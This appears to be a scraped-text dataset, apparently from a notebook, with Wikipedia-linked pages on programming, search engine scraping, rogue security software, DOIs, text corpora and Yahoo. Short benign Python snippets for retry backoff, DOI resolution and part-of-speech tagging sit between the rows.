After the bug is reproduced, the input of the program may need to be simplified to make it easier to debug. For example, when a bug in a compiler can make it crash when parsing some large source file, a simplification of the test case that results in only few lines from the original source file can be sufficient to reproduce the same crash. Trial-and-error divide-and-conquer is needed: the programmer will try to remove some parts of the original test case and check if the problem still exists. When debugging the problem in a GUI, the programmer can try to skip some user interaction from the original problem description and check if the remaining actions are sufficient for bugs to appear. Scripting and breakpointing are also part of this process. Debugging is often done with IDEs. Standalone debuggers like GDB are also used, and these often provide less of a visual environment, usually using a command line. Some text editors such as Emacs allow GDB to be invoked through them, to provide a visual environment. Different programming languages support different styles of programming (called programming paradigms). The choice of language used is subject to many considerations, such as company policy, suitability to task, availability of third-party packages, or individual preference. Ideally, the programming language best suited for the task at hand will be selected. Trade-offs from this ideal involve finding enough programmers who know the language to build a team, the availability of compilers for that language, and the efficiency with which programs written in a given language execute. Languages form an approximate spectrum from "low-level" to "high-level"; "low-level" languages are typically more machine-oriented and faster to execute, whereas "high-level" languages are more abstract and easier to use but execute less quickly. It is usually easier to code in "high-level" languages than in "low-level" ones. Programming languages are essential for software development. They are the building blocks for all software, from the simplest applications to the most sophisticated ones. Allen Downey, in his book How To Think Like A Computer Scientist, writes: Many computer languages provide a mechanism to call functions provided by shared libraries. Provided the functions in a library follow the appropriate run-time conventions (e.g., method of passing arguments), then these functions may be written in any other language. Computer programmers are those who write computer software. Their jobs usually involve: Although programming has been presented in the media as a somewhat mathematical subject, some research shows that good programmers have strong skills in natural human languages, and that learning to code is similar to learning a foreign language. 26 27 |
448 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Search_engine_scraping | Search engine scraping is the process of harvesting URLs, descriptions, or other information from search engines. This is a specific form of screen scraping or web scraping dedicated to search engines only. Most commonly, larger search engine optimization (SEO) providers depend on regularly scraping keywords from search engines to monitor the competitive position of their customers' websites for relevant keywords or their indexing status. The process of entering a website and extracting data in an automated fashion is also often called "crawling". Search engines get almost all their data from automated crawling bots. Google is by far the largest search engine, with the most users as well as the most advertising revenue, which makes Google the most important search engine to scrape for SEO-related companies. 1 Although Google does not take legal action against scraping, it uses a range of defensive methods that make scraping its results a challenging task, even when the scraping tool realistically spoofs a normal web browser. When a search engine's defenses suspect that an access might be automated, the search engine can react in several ways. The first layer of defense is a captcha page, 4 where the user is prompted to verify that they are a real person and not a bot or tool. Solving the captcha creates a cookie that permits access to the search engine again for a while; after about one day, the captcha page is displayed again. The second layer of defense is a similar error page, but without a captcha; in this case the user is completely blocked from using the search engine until the temporary block is lifted or the user changes their IP address. The third layer of defense is a long-term block of the entire network segment; Google has blocked large network blocks for months. This sort of block is likely triggered by an administrator and only happens if a scraping tool is sending a very high number of requests. All these forms of detection may also happen to a normal user, especially users sharing the same IP address or network class (IPv4 as well as IPv6 ranges). To scrape a search engine successfully, the two major factors are time and amount: the more keywords a user needs to scrape and the shorter the time available for the job, the more difficult scraping will be and the more developed a scraping script or tool needs to be. Scraping scripts need to overcome a few technical challenges. When developing a scraper for a search engine, almost any programming language can be used, although, depending on performance requirements, some languages will be more favorable than others. PHP is a commonly used language for writing scraping scripts for websites or backend services, since it has powerful capabilities built in (DOM parsers, libcURL); however, its memory usage is typically about ten times that of similar C/C++ code. Ruby on Rails as well as Python are also frequently used to automate scraping jobs. Additionally, bash scripting can be used together with cURL as a command-line tool to scrape a search engine. When scraping websites and services, legality is often a major concern for companies; for web scraping it depends greatly on the country the scraping company operates from, as well as on which data or website is being scraped, and there have been many different court rulings all over the world. 
5 6 However, when it comes to scraping search engines the situation is different: search engines usually do not list intellectual property of their own, as they merely repeat or summarize information they have scraped from other websites. The largest publicly known incident of a search engine being scraped happened in 2011, when Microsoft was caught scraping unknown keywords from Google for its own, then rather new Bing service, 7 but even this incident did not result in a court case. |
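A scraper that runs into the layered defences described above typically slows down rather than pressing on; a generic retry-with-backoff sketch (not specific to any search engine, and the user-agent string is a placeholder):

import time
import requests

def fetch_with_backoff(url, max_attempts=5):
    # Retry with exponentially increasing delays when the server refuses
    # the request, the usual response to rate limiting or temporary blocks.
    delay = 5
    for _ in range(max_attempts):
        response = requests.get(url, headers={"User-Agent": "Mozilla/5.0"}, timeout=10)
        if response.status_code == 200:
            return response
        time.sleep(delay)
        delay *= 2
    return None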
449 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Rogue_security_software | Rogue security software is a form of malicious software and internet fraud that misleads users into believing there is a virus on their computer and aims to convince them to pay for a fake malware removal tool that actually installs malware on their computer. 1 It is a form of scareware that manipulates users through fear, and a form of ransomware. 2 Rogue security software has been a serious security threat in desktop computing since 2008. 3 An early example that gained infamy was SpySheriff and its clones, a such as Nava Shield. With the rise of cyber-criminals and a black market with thousands of organizations and individuals trading exploits, malware, virtual assets, and credentials, rogue security software has become one of the most lucrative criminal operations. Rogue security software mainly relies on social engineering (fraud) to defeat the security built into modern operating system and browser software and install itself onto victims' computers. 3 A website may, for example, display a fictitious warning dialog stating that someone's machine is infected with a computer virus, and encourage them through manipulation to install or purchase scareware in the belief that they are purchasing genuine antivirus software. Most have a Trojan horse component, which users are misled into installing. The Trojan may be disguised as: Some rogue security software, however, propagate onto users' computers as drive-by downloads which exploit security vulnerabilities in web browsers, PDF viewers, or email clients to install themselves without any manual interaction. 4 6 More recently, malware distributors have been utilizing SEO poisoning techniques by pushing infected URLs to the top of search engine results about recent news events. People looking for articles on such events on a search engine may encounter results that, upon being clicked, are instead redirected through a series of sites 7 before arriving at a landing page that says that their machine is infected and pushes a download to a "trial" of the rogue program. 8 9 A 2010 study by Google found 11,000 domains hosting fake anti-virus software, accounting for 50% of all malware delivered via internet advertising. 10 Cold-calling has also become a vector for distribution of this type of malware, with callers often claiming to be from "Microsoft Support" or another legitimate organization. 11 Black Hat search engine optimization (SEO) is a technique used to trick search engines into displaying malicious URLs in search results. The malicious webpages are filled with popular keywords in order to achieve a higher ranking in the search results. When the end user searches the web, one of these infected webpages is returned. Usually the most popular keywords from services such as Google Trends are used to generate webpages via PHP scripts placed on the compromised website. These PHP scripts will then monitor for search engine crawlers and feed them with specially crafted webpages that are then listed in the search results. Then, when the user searches for their keyword or images and clicks on the malicious link, they will be redirected to the Rogue security software payload. 12 13 Most websites usually employ third-party services for advertising on their webpages. If one of these advertising services is compromised, they may end up inadvertently infecting all of the websites using their service by advertising rogue security software. 
13 Spam messages that include malicious attachments, links to binaries and drive-by download sites are another common mechanism for distributing rogue security software. Spam emails are often sent with content associated with typical day-to-day activities such as parcel deliveries, or taxation documents, designed to entice users to click on links or run attachments. When users succumb to these kinds of social engineering tricks they are quickly infected either directly via the attachment, or indirectly via a malicious website. This is known as a drive-by download. Usually in drive-by download attacks the malware is installed on the victim's machine without any interaction or awareness and occurs simply by visiting the website. 13 Once installed, the rogue security software may then attempt to entice the user into purchasing a service or additional software by: Developers of rogue security software may also entice people into purchasing their product by claiming to give a portion of their sales to a charitable cause. The rogue Green antivirus, for example, claims to donate $2 to an environmental care program for each sale made. Some rogue security software overlaps in function with scareware by also: Sanction by the FTC and the increasing effectiveness of anti-malware tools since 2006 have made it difficult for spyware and adware distribution networks—already complex to begin with 16 —to operate profitably. 17 Malware vendors have turned instead to the simpler, more profitable business model of rogue security software, which is targeted directly at users of desktop computers. 18 Rogue security software is often distributed through highly lucrative affiliate networks, in which affiliates supplied with Trojan kits for the software are paid a fee for every successful installation, and a commission from any resulting purchases. The affiliates then become responsible for setting up infection vectors and distribution infrastructure for the software. 19 An investigation by security researchers into the Antivirus XP 2008 rogue security software found just such an affiliate network, in which members were grossing commissions upwards of USD150,000 over 10 days, from tens of thousands of successful installations. 20 Despite its use of old-fashioned and somewhat unsophisticated techniques, rogue security software has become a significant security threat, due to the size of the impacted populations, the number of different variants that have been unleashed (over 250), and the profits that have been made for cyber-criminals (over $300,000 a month). 21 Law enforcement and legislation in all countries are slow to react to the appearance of rogue security software. In contrast, several private initiatives providing discussion forums and lists of dangerous products were founded soon after the appearance of the first rogue security software. Some reputable vendors, such as Kaspersky, 22 also began to provide lists of rogue security software. In 2005, the Anti-Spyware Coalition was founded, a coalition of anti-spyware software companies, academics, and consumer groups. Many of the private initiatives were initially informal discussions on general Internet forums, but some were started or even entirely carried out by individual people. The perhaps most famous and extensive one is the Spyware Warrior list of rogue suspect antispyware products and websites by Eric Howes, 23 which has however not been updated since May 2007. 
The website recommends checking the following websites for new rogue anti-spyware programs, most of which are not really new and are "simply re-branded clones and knockoffs of the same rogue applications that have been around for years. 24 In December 2008, the US District Court for Maryland—at the request of the FTC—issued a restraining order against Innovative Marketing Inc, a Kyiv-based firm producing and marketing the rogue security software products WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus. 25 The company and its US-based web host, ByteHosting Internet Hosting Services LLC, had their assets frozen, were barred from using domain names associated with those products and any further advertisement or false representation. 26 Law enforcement has also exerted pressure on banks to shut down merchant gateways involved in processing rogue security software purchases. In some cases, the high volume of credit card chargebacks generated by such purchases has also prompted processors to take action against rogue security software vendors. 27 |
450 | https://en.wikipedia.org/wiki/Web_scraping | http://www.gooseeker.com/en/node/knowledgebase/freeformat | FreeFormat is an approach to semantically annotating Web pages. Instead of reauthoring the Web contents as Microformat does, the semantic annotation markups are managed in a standalone layer which is shared and collaboratively edited by Web users. On the Web, nearly all pages are authored with some kind of markup language. The traditional markup tags are for presenting the contents in Web browsers; in order for software to automatically process the contents, additional metadata are necessary to describe what the contents are about. A few approaches have emerged to convey the semantics of the contents. Microformat, one major approach, seeks to re-use existing XHTML and HTML tags to convey metadata and other attributes. Although Microformat is an open community, it acts more like a standards body: a microformat can be published by any community member, but it only makes sense once it is accepted by enough members, and it can take considerable time for a format to become a de facto standard. The Web, however, is growing too quickly to wait for new standards to be voted on. Furthermore, once a microformat has been accepted as a de facto standard, it costs too much to re-author the existing Web pages. In practice, Web content authors already annotate their published contents with markup tags and attributes, most of the time for presentation effects: for example, an author may annotate a content snippet with a special value of the class attribute to display it with a special background colour via CSS. Such display effects usually imply some semantics and try to make the content more understandable, so the existing annotations are worth mining for semantics. Every author annotates published contents freely to some degree, and there should be an approach to recognize and register these free semantic annotations; FreeFormat is such an approach. FreeFormat mines semantics from the free annotations and formats them into semantic structures which are managed and hosted on the Internet. As a result, a metadata repository, or knowledge base, is built up and acts as a semantics registration center. Anyone can publish their own semantic structures for their contents, which can instruct third-party software to automatically process those contents. As the repository grows larger, it can be viewed as a semantic layer covering the underlying Web contents. FreeFormat, invented by GooSeeker, is intended as an effective approach to reformatting contents on the Web. MetaCamp Server, implemented by GooSeeker, is a Web-based application that manages the metadata repository and provides collaborative tools for community members to share semantic structures. MetaSeeker Toolkit V3.x has fully implemented FreeFormat; please refer to the release notes for detailed information. |
451 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Doi_(identifier) | A digital object identifier (DOI) is a persistent identifier or handle used to uniquely identify various objects, standardized by the International Organization for Standardization (ISO). 1 DOIs are an implementation of the Handle System; 2 3 they also fit within the URI system (Uniform Resource Identifier). They are widely used to identify academic, professional, and government information, such as journal articles, research reports, data sets, and official publications. A DOI aims to resolve to its target, the information object to which the DOI refers. This is achieved by binding the DOI to metadata about the object, such as a URL where the object is located. Thus, by being actionable and interoperable, a DOI differs from ISBNs or ISRCs which are identifiers only. The DOI system uses the indecs Content Model for representing metadata. The DOI for a document remains fixed over the lifetime of the document, whereas its location and other metadata may change. Referring to an online document by its DOI should provide a more stable link than directly using its URL. But if its URL changes, the publisher must update the metadata for the DOI to maintain the link to the URL. 4 5 6 It is the publisher's responsibility to update the DOI database. If they fail to do so, the DOI resolves to a dead link, leaving the DOI useless. 7 The developer and administrator of the DOI system is the International DOI Foundation (IDF), which introduced it in 2000. 8 Organizations that meet the contractual obligations of the DOI system and are willing to pay to become a member of the system can assign DOIs. 9 The DOI system is implemented through a federation of registration agencies coordinated by the IDF. 10 By late April 2011 more than 50 million DOI names had been assigned by some 4,000 organizations, 11 and by April 2013 this number had grown to 85 million DOI names assigned through 9,500 organizations citation needed . A DOI is a type of Handle System handle, which takes the form of a character string divided into two parts, a prefix and a suffix, separated by a slash. The prefix identifies the registrant of the identifier and the suffix is chosen by the registrant and identifies the specific object associated with that DOI. Most legal Unicode characters are allowed in these strings, which are interpreted in a case-insensitive manner. The prefix usually takes the form 10.NNNN, where NNNN is a number greater than or equal to 1000, whose limit depends only on the total number of registrants. 12 13 The prefix may be further subdivided with periods, like 10.NNNN.N. 14 For example, in the DOI name 10.1000 182, the prefix is 10.1000 and the suffix is 182. The "10" part of the prefix distinguishes the handle as part of the DOI namespace, as opposed to some other Handle System namespace, A and the characters 1000 in the prefix identify the registrant; in this case the registrant is the International DOI Foundation itself. 182 is the suffix, or item ID, identifying a single object (in this case, the latest version of the DOI Handbook). DOI names can identify creative works (such as texts, images, audio or video items, and software) in both electronic and physical forms, performances, and abstract works 15 such as licenses, parties to a transaction, etc. 
The names can refer to objects at varying levels of detail: thus DOI names can identify a journal, an individual issue of a journal, an individual article in the journal, or a single table in that article. The choice of level of detail is left to the assigner, but in the DOI system it must be declared as part of the metadata that is associated with a DOI name, using a data dictionary based on the indecs Content Model. The official DOI Handbook explicitly states that DOIs should be displayed on screens and in print in the format doi:10.1000/182. 16 Contrary to the DOI Handbook, CrossRef, a major DOI registration agency, recommends displaying a URL (for example, https://doi.org/10.1000/182) instead of the officially specified format (for example, doi:10.1000/182). 17 18 This URL is persistent (there is a contract that ensures persistence in the DOI.ORG domain), so it is a PURL—providing the location of an HTTP proxy server which will redirect web accesses to the correct online location of the linked item. 9 19 The CrossRef recommendation is primarily based on the assumption that the DOI is being displayed without being hyperlinked to its appropriate URL—the argument being that without the hyperlink it is not as easy to copy-and-paste the full URL to actually bring up the page for the DOI, thus the entire URL should be displayed, allowing people viewing the page containing the DOI to copy-and-paste the URL, by hand, into a new window/tab in their browser in order to go to the appropriate page for the document the DOI represents. 20 Since DOI is a namespace within the Handle System, it is semantically correct to represent it as the URI info:doi/10.1000/182. Major content of the DOI system currently includes: In the Organisation for Economic Co-operation and Development's publication service OECD iLibrary, each table or graph in an OECD publication is shown with a DOI name that leads to an Excel file of data underlying the tables and graphs. Further development of such services is planned. 22 Other registries include Crossref and the multilingual European DOI Registration Agency (mEDRA). 23 Since 2015, RFCs can be referenced as doi:10.17487/rfc.... 24 The IDF designed the DOI system to provide a form of persistent identification, in which each DOI name permanently and unambiguously identifies the object to which it is associated (although when the publisher of a journal changes, sometimes all the DOIs will be changed, with the old DOIs no longer working). It also associates metadata with objects, allowing it to provide users with relevant pieces of information about the objects and their relationships. Included as part of this metadata are network actions that allow DOI names to be resolved to web locations where the objects they describe can be found. To achieve its goals, the DOI system combines the Handle System and the indecs Content Model with a social infrastructure. The Handle System ensures that the DOI name for an object is not based on any changeable attributes of the object such as its physical location or ownership, that the attributes of the object are encoded in its metadata rather than in its DOI name, and that no two objects are assigned the same DOI name. Because DOI names are short character strings, they are human-readable, may be copied and pasted as text, and fit into the URI specification. 
The DOI name-resolution mechanism acts behind the scenes, so that users communicate with it in the same way as with any other web service; it is built on open architectures, incorporates trust mechanisms, and is engineered to operate reliably and flexibly so that it can be adapted to changing demands and new applications of the DOI system. 25 DOI name-resolution may be used with OpenURL to select the most appropriate among multiple locations for a given object, according to the location of the user making the request. 26 However, despite this ability, the DOI system has drawn criticism from librarians for directing users to non-free copies of documents, that would have been available for no additional fee from alternative locations. 27 The indecs Content Model as used within the DOI system associates metadata with objects. A small kernel of common metadata is shared by all DOI names and can be optionally extended with other relevant data, which may be public or restricted. Registrants may update the metadata for their DOI names at any time, such as when publication information changes or when an object moves to a different URL. The International DOI Foundation (IDF) oversees the integration of these technologies and operation of the system through a technical and social infrastructure. The social infrastructure of a federation of independent registration agencies offering DOI services was modelled on existing successful federated deployments of identifiers such as GS1 and ISBN. A DOI name differs from commonly used Internet pointers to material, such as the Uniform Resource Locator (URL), in that it identifies an object itself as a first-class entity, rather than the specific place where the object is located at a certain time. It implements the Uniform Resource Identifier (Uniform Resource Name) concept and adds to it a data model and social infrastructure. 28 A DOI name also differs from standard identifier registries such as the ISBN, ISRC, etc. The purpose of an identifier registry is to manage a given collection of identifiers, whereas the primary purpose of the DOI system is to make a collection of identifiers actionable and interoperable, where that collection can include identifiers from many other controlled collections. 29 The DOI system offers persistent, semantically interoperable resolution to related current data and is best suited to material that will be used in services outside the direct control of the issuing assigner (e.g., public citation or managing content of value). It uses a managed registry (providing both social and technical infrastructure). It does not assume any specific business model for the provision of identifiers or services and enables other existing services to link to it in defined ways. Several approaches for making identifiers persistent have been proposed. The comparison of persistent identifier approaches is difficult because they are not all doing the same thing. Imprecisely referring to a set of schemes as "identifiers" does not mean that they can be compared easily. Other "identifier systems" may be enabling technologies with low barriers to entry, providing an easy to use labeling mechanism that allows anyone to set up a new instance (examples include Persistent Uniform Resource Locator (PURL), URLs, Globally Unique Identifiers (GUIDs), etc.), but may lack some of the functionality of a registry-controlled scheme and will usually lack accompanying metadata in a controlled scheme. 
The DOI system does not have this approach and should not be compared directly to such identifier schemes. Various applications using such enabling technologies with added features have been devised that meet some of the features offered by the DOI system for specific sectors (e.g., ARK). A DOI name does not depend on the object's location and, in this way, is similar to a Uniform Resource Name (URN) or PURL but differs from an ordinary URL. URLs are often used as substitute identifiers for documents on the Internet although the same document at two different locations has two URLs. By contrast, persistent identifiers such as DOI names identify objects as first class entities: two instances of the same object would have the same DOI name. DOI name resolution is provided through the Handle System, developed by Corporation for National Research Initiatives, and is freely available to any user encountering a DOI name. Resolution redirects the user from a DOI name to one or more pieces of typed data: URLs representing instances of the object, services such as e-mail, or one or more items of metadata. To the Handle System, a DOI name is a handle, and so has a set of values assigned to it and may be thought of as a record that consists of a group of fields. Each handle value must have a data type specified in its type field, which defines the syntax and semantics of its data. While a DOI persistently and uniquely identifies the object to which it is assigned, DOI resolution may not be persistent, due to technical and administrative issues. To resolve a DOI name, it may be input to a DOI resolver, such as doi.org. Another approach, which avoids typing or cutting-and-pasting into a resolver is to include the DOI in a document as a URL which uses the resolver as an HTTP proxy, such as https://doi.org (preferred) 30 or http://dx.doi.org, both of which support HTTPS. For example, the DOI 10.1000/182 can be included in a reference or hyperlink as https://doi.org/10.1000/182. This approach allows users to click on the DOI as a normal hyperlink. Indeed, as previously mentioned, this is how CrossRef recommends that DOIs always be represented (preferring HTTPS over HTTP), so that if they are cut-and-pasted into other documents, emails, etc., they will be actionable. Other DOI resolvers and HTTP Proxies include the Handle System and PANGAEA. At the beginning of the year 2016, a new class of alternative DOI resolvers was started by http://doai.io. This service is unusual in that it tries to find a non-paywalled (often author archived) version of a title and redirects the user to that instead of the publisher's version. 31 32 Since then, other open-access favoring DOI resolvers have been created, notably https://oadoi.org in October 2016 33 (later Unpaywall). While traditional DOI resolvers solely rely on the Handle System, alternative DOI resolvers first consult open access resources such as BASE (Bielefeld Academic Search Engine). 31 33 An alternative to HTTP proxies is to use one of a number of add-ons and plug-ins for browsers, thereby avoiding the conversion of the DOIs to URLs, 34 which depend on domain names and may be subject to change, while still allowing the DOI to be treated as a normal hyperlink. A disadvantage of this approach for publishers is that, at least at present, most users will be encountering the DOIs in a browser, mail reader, or other software which does not have one of these plug-ins installed. 
The International DOI Foundation (IDF), a non-profit organisation created in 1997, is the governance body of the DOI system. 35 It safeguards all intellectual property rights relating to the DOI system, manages common operational features, and supports the development and promotion of the DOI system. The IDF ensures that any improvements made to the DOI system (including creation, maintenance, registration, resolution and policymaking of DOI names) are available to any DOI registrant. It also prevents third parties from imposing additional licensing requirements beyond those of the IDF on users of the DOI system. The IDF is controlled by a Board elected by the members of the Foundation, with an appointed Managing Agent who is responsible for co-ordinating and planning its activities. Membership is open to all organizations with an interest in electronic publishing and related enabling technologies. The IDF holds annual open meetings on the topics of DOI and related issues. Registration agencies, appointed by the IDF, provide services to DOI registrants: they allocate DOI prefixes, register DOI names, and provide the necessary infrastructure to allow registrants to declare and maintain metadata and state data. Registration agencies are also expected to actively promote the widespread adoption of the DOI system, to cooperate with the IDF in the development of the DOI system as a whole, and to provide services on behalf of their specific user community. A list of current RAs is maintained by the International DOI Foundation. The IDF is recognized as one of the federated registrars for the Handle System by the DONA Foundation (of which the IDF is a board member), and is responsible for assigning Handle System prefixes under the top-level 10 prefix. 36 Registration agencies generally charge a fee to assign a new DOI name; parts of these fees are used to support the IDF. The DOI system overall, through the IDF, operates on a not-for-profit cost recovery basis. The DOI system is an international standard developed by the International Organization for Standardization in its technical committee on identification and description, TC46 SC9. 37 The Draft International Standard ISO DIS 26324, Information and documentation Digital Object Identifier System met the ISO requirements for approval. The relevant ISO Working Group later submitted an edited version to ISO for distribution as an FDIS (Final Draft International Standard) ballot, 38 which was approved by 100% of those voting in a ballot closing on 15 November 2010. 39 The final standard was published on 23 April 2012. 1 DOI is a registered URI under the info URI scheme specified by IETF RFC 4452. info:doi is the infoURI Namespace of Digital Object Identifiers. 40 The DOI syntax is a NISO standard, first standardized in 2000, ANSI NISO Z39.84 2005 Syntax for the Digital Object Identifier. 41 The maintainers of the DOI system have deliberately not registered a DOI namespace for URNs, stating that: URN architecture assumes a DNS-based Resolution Discovery Service (RDS) to find the service appropriate to the given URN scheme. However no such widely deployed RDS schemes currently exist.... DOI is not registered as a URN namespace, despite fulfilling all the functional requirements, since URN registration appears to offer no advantage to the DOI System. 
It requires an additional layer of administration for defining DOI as a URN namespace (the string urn:doi:10.1000/1 rather than the simpler doi:10.1000/1) and an additional step of unnecessary redirection to access the resolution service, already achieved through either HTTP proxy or native resolution. If RDS mechanisms supporting URN specifications become widely available, DOI will be registered as a URN. |
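The DOI structure and proxy resolution described in the row above are easy to exercise from this notebook. Below is a minimal sketch, reusing the requests import from the setup cells: it splits a DOI into its registrant prefix and item suffix, then follows the doi.org HTTP proxy redirect to the current landing page. The helper names split_doi and resolve_doi and the timeout value are illustrative choices, not anything mandated by the DOI system.
import requests  # already imported in the setup cells above

def split_doi(doi):
    """Split a DOI such as '10.1000/182' into (prefix, suffix)."""
    doi = doi.strip()
    if doi.lower().startswith("doi:"):  # drop the optional display prefix
        doi = doi[4:]
    prefix, sep, suffix = doi.partition("/")
    if not sep or not prefix.startswith("10."):
        raise ValueError(f"Not a well-formed DOI: {doi!r}")
    return prefix, suffix

def resolve_doi(doi, timeout=10):
    """Follow the doi.org proxy redirects and return the final landing URL."""
    response = requests.get(f"https://doi.org/{doi}", allow_redirects=True, timeout=timeout)
    return response.url

print(split_doi("doi:10.1000/182"))  # ('10.1000', '182')
print(resolve_doi("10.1000/182"))    # wherever the DOI Handbook currently resolves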
452 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Text_corpus | In linguistics and natural language processing, a corpus (pl.: corpora) or text corpus is a dataset, consisting of natively digital and older, digitalized, language resources, either annotated or unannotated. Annotated, they have been used in corpus linguistics for statistical hypothesis testing, checking occurrences or validating linguistic rules within a specific language territory. In search technology, a corpus is the collection of documents which is being searched. A corpus may contain texts in a single language (monolingual corpus) or text data in multiple languages (multilingual corpus). In order to make the corpora more useful for doing linguistic research, they are often subjected to a process known as annotation. An example of annotating a corpus is part-of-speech tagging, or POS-tagging, in which information about each word's part of speech (verb, noun, adjective, etc.) is added to the corpus in the form of tags. Another example is indicating the lemma (base) form of each word. When the language of the corpus is not a working language of the researchers who use it, interlinear glossing is used to make the annotation bilingual. Some corpora have further structured levels of analysis applied. In particular, smaller corpora may be fully parsed. Such corpora are usually called Treebanks or Parsed Corpora. The difficulty of ensuring that the entire corpus is completely and consistently annotated means that these corpora are usually smaller, containing around one to three million words. Other levels of linguistic structured analysis are possible, including annotations for morphology, semantics and pragmatics. Corpora are the main knowledge base in corpus linguistics. Other notable areas of application include: |
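Since the row above gives part-of-speech tagging as the canonical example of corpus annotation, here is a minimal sketch of what that looks like in Python. It assumes the NLTK library, which the install cells at the top of this notebook do not cover (pip install nltk would be needed), and the tokenizer/tagger resource names can differ slightly between NLTK releases.
import nltk  # assumed installed separately: pip install nltk

# One-time resource downloads; resource names may vary by NLTK version.
nltk.download("punkt")
nltk.download("averaged_perceptron_tagger")

sentence = "Web scraping extracts useful data from web pages."
tokens = nltk.word_tokenize(sentence)   # split the raw text into word tokens
tagged = nltk.pos_tag(tokens)           # attach a part-of-speech tag to every token
print(tagged)  # e.g. [('Web', 'NNP'), ('scraping', 'NN'), ('extracts', 'VBZ'), ...]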
453 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=8 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Data scraping. |
454 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Yahoo! | Yahoo ( j hu , styled yahoo in its logo) 4 5 is an American web services provider. It is headquartered in Sunnyvale, California, and operated by the namesake company Yahoo Inc., which is 90% owned by investment funds managed by Apollo Global Management and 10% by Verizon Communications. It provides a web portal, search engine Yahoo Search, and related services, including My Yahoo , Yahoo Mail, Yahoo News, Yahoo Finance, Yahoo Sports and its advertising platform, Yahoo Native. Yahoo was established by Jerry Yang and David Filo in January 1994 and was one of the pioneers of the early Internet era in the 1990s. 6 However, its use declined in the 2010s as some of its services were discontinued, and it lost market share to Facebook and Google. 7 8 In January 1994, Jerry Yang and David Filo were electrical engineering graduate students at Stanford University, when they created a website named "Jerry and David's guide to the World Wide Web". 9 10 11 12 The site was a human-edited web directory, organized in a hierarchy, as opposed to a searchable index of pages. In March 1994, "Jerry and David's Guide to the World Wide Web" was renamed "Yahoo and became known as the Yahoo Directory. 10 13 14 15 16 The "yahoo.com" domain was registered on January 18, 1995. 17 The word "yahoo" is a backronym for "Yet Another Hierarchically Organized Oracle" 18 or "Yet Another Hierarchical Officious Oracle". 19 The term "hierarchical" described how the Yahoo database was arranged in layers of subcategories. The term "oracle" was intended to mean "source of truth and wisdom", and the term "officious", rather than being related to the word's normal meaning, described the many office workers who would use the Yahoo database while surfing from work. 20 However, Filo and Yang insist they mainly selected the name because they liked the slang definition of a "yahoo" (used by college students in David Filo's native Louisiana in the late 1980s and early 1990s to refer to an unsophisticated, rural Southerner): "rude, unsophisticated, uncouth. 21 This meaning derives from the Yahoo race of fictional beings from Gulliver's Travels. Yahoo was incorporated on March 2, 1995. In 1995, a search engine function, called Yahoo Search, was introduced. This allowed users to search Yahoo Directory. 22 23 Yahoo soon became the first popular online directory and search engine on the World Wide Web. 24 Yahoo grew rapidly throughout the 1990s. Yahoo became a public company via an initial public offering in April 1996 and its stock price rose 600% within two years. 25 Like many search engines and web directories, Yahoo added a web portal, putting it in competition with services including Excite, Lycos, and America Online. 26 By 1998, Yahoo was the most popular starting point for web users, 27 and the human-edited Yahoo Directory the most popular search engine, 15 receiving 95 million page views per day, triple that of rival Excite. 25 It also made many high-profile acquisitions. Yahoo began offering free e-mail from October 1997 after the acquisition of RocketMail, which was then renamed to Yahoo Mail. 28 In 1998, Yahoo replaced AltaVista as the crawler-based search engine underlying the Directory with Inktomi. 29 Yahoo's two biggest acquisitions were made in 1999: Geocities for $3.6 billion 30 and Broadcast.com for $5.7 billion. 31 Its stock price skyrocketed during the dot-com bubble, closing at an all-time high of $118.75 share on January 3, 2000. 
